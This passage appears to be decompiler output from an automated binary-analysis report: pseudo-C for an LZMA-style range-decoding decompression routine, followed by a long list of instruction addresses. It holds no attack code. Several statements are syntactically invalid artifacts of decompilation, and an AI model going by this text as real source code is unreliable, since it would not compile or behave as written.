												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x00000000
                                                                                                                        0x0040739b
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x004074c7
                                                                                                                        0x004074cb
                                                                                                                        0x0040752b
                                                                                                                        0x0040752e
                                                                                                                        0x00407533
                                                                                                                        0x00407534
                                                                                                                        0x00407536
                                                                                                                        0x00407538
                                                                                                                        0x0040753b
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406bec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x00000000
                                                                                                                        0x00406bfd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c06
                                                                                                                        0x00406c09
                                                                                                                        0x00406c0c
                                                                                                                        0x00406c10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c16
                                                                                                                        0x00406c19
                                                                                                                        0x00406c1b
                                                                                                                        0x00406c1c
                                                                                                                        0x00406c1f
                                                                                                                        0x00406c21
                                                                                                                        0x00406c22
                                                                                                                        0x00406c24
                                                                                                                        0x00406c27
                                                                                                                        0x00406c2c
                                                                                                                        0x00406c31
                                                                                                                        0x00406c3a
                                                                                                                        0x00406c4d
                                                                                                                        0x00406c50
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c94
                                                                                                                        0x00406c94
                                                                                                                        0x00406c98
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c88
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8c
                                                                                                                        0x00406c8c
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c67
                                                                                                                        0x00406c70
                                                                                                                        0x00406c78
                                                                                                                        0x00406c7b
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c9e
                                                                                                                        0x00406c9e
                                                                                                                        0x00406ca2
                                                                                                                        0x0040754e
                                                                                                                        0x00000000
                                                                                                                        0x0040754e
                                                                                                                        0x00406cab
                                                                                                                        0x00406cbb
                                                                                                                        0x00406cbe
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406cca
                                                                                                                        0x00406cd0
                                                                                                                        0x00406cfa
                                                                                                                        0x00406d00
                                                                                                                        0x00406d07
                                                                                                                        0x00000000
                                                                                                                        0x00406d07
                                                                                                                        0x00406cd6
                                                                                                                        0x00406cd9
                                                                                                                        0x00406cde
                                                                                                                        0x00406cde
                                                                                                                        0x00406ce9
                                                                                                                        0x00406cf1
                                                                                                                        0x00406cf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d39
                                                                                                                        0x00406d3f
                                                                                                                        0x00406d42
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d12
                                                                                                                        0x0040755d
                                                                                                                        0x00000000
                                                                                                                        0x0040755d
                                                                                                                        0x00406d1e
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d2f
                                                                                                                        0x00406d32
                                                                                                                        0x00406d37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
